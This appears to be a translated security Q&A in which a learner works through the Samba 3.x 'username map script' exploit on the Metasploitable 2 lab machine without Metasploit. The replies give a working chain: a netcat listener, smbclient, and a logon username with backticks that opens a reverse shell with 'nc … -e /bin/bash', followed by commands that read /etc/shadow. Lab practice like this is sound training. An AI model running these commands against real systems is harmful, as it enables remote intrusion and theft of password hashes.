我试图在不使用Metasploit的情况下开发Metasploitable 2,目的是学习。在本例中,我将重点关注Samba 3.x (端口TCP 139,445)。
在这个链接中,http://www.rwbnetsec.com/samba-3-x/解释了在nmap扫描显示TCP端口139和445打开后利用这台机器的两种不同方法,它们运行着Samba 3.x。
第二种方法解释说
此漏洞利用Samba的“用户名映射脚本”功能。没有用户输入的过滤,因此攻击者可以连接到SMB会话,并使用shell元字符作为用户名的输入,从而在远程系统上执行命令。这可能使攻击者能够通过根访问获取到受攻击计算机的远程外壳。
当使用Metasploit时,我的问题就出现了,因为它用于:
我终于找到了避免Metasploit的视频https://www.youtube.com/watch?v=-Y8-fZAvq9c,但它对我不起作用,下面是这样的(Kali=192.168.200.1;Metasploitable2=192.168.200.130):
nc 192.168.200.1 4444 -e /bin/bash“。最后一点不适用于以下错误消息“会话设置失败: NT_STATUS_NO_MEMORY”。
我很难找到一个很好的手册来解释“登录”命令。我试图改变netcat的使用方式:
在第1点,我写
smb: \> nc -nlvp 4444 -e /bin/bash在第4点,我写
smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"同样的结果。同样的信息错误。
我真的想自己做,但做不到。如果你能帮我,我会非常感激的。
发布于 2018-08-12 21:08:19
看起来您正在smb (易受攻击框)中设置侦听器。
smb: \> nc -nlvp 4444 -e /bin/bash你应该做的是在你的攻击盒中设置听者。相反,使用以下命令:
nc -nlvp 4444 最后,从您的metasploitable2发出命令:
logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"发布于 2018-08-14 13:12:34
对于那些和我有同样问题的人,我回答我是如何解决的,根据前面的答案,以及这个链接Metasploitable 2-Samba。
应采取的步骤如下:
netcat -nlvp 4444smbclient -L //192.168.200.130tmp文件夹,并连接到受害者:smbclient //192.168.200.130/tmpsmb: >,其中命令logon用于反向连接到Kali,作为smb:> logon "/=nc 192.168.200.1 4444 -e /bin/bash“小心:别忘了背虱。
idhostnameuname -acat /etc/shadow提示密码时,只需单击enter (保留为空)。
https://security.stackexchange.com/questions/177083
复制相似问题